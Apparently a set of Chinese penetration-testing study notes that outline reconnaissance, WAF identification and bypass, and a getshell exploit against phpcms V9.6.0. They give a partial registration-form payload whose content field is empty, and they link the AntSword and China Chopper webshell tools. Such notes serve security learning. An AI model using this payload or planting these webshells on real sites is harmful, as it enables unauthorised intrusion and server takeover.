目录:
一、目标信息
二、目标架构
三、目标信息整理
四、相关工具
一:目标信息
Q:什么是目标信息?
A:1、目标人物
2、目标事件
3、目标的一切
eg:https://github.com/iSafeBlue/TrackRay
https://github.com/shmilylty/OneForAll
二:目标架构
Q:目标架构有什么作用?
A:发现更多漏洞:
1、远程代码执行
2、解析漏洞
3、C段存在多站点
4、Waf – 1.识别 2.绕过 3.拿下站点
三:目标信息整理
Q:主要收集整理哪些信息?
A:1、授权渗透测试目的:拿到Webshell,脚本语言:php 中间件:iis6.0,nginx
cms:phpcms V9.6.0
2、信息收集
3、漏洞利用(漏洞利用文章:http://blog.nsfocus.net/phpcms-v9-6-getshell-0day-vulnerability-analysis/)
4、权限提升
四:相关工具
1:payload:
siteid=1&modelid=11&username=rootde1&password=ssevses&[email protected]&info[content]=
&dosubmit=1&protocol=
2:安装中国蚁剑:https://blog.csdn.net/qq1045553189/article/details/87517612
3:蚁剑目录:https://github.com/AntSwordProject/antSword
加速器:https://github.com/AntSwordProject/AntSword-Loader
中国蚁剑安装流程:https://blog.csdn.net/qq_36235492/article/details/85713821
中国菜刀:https://baike.baidu.com/item/%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80/3963062?fr=aladdin
安装hackbar
社区搜索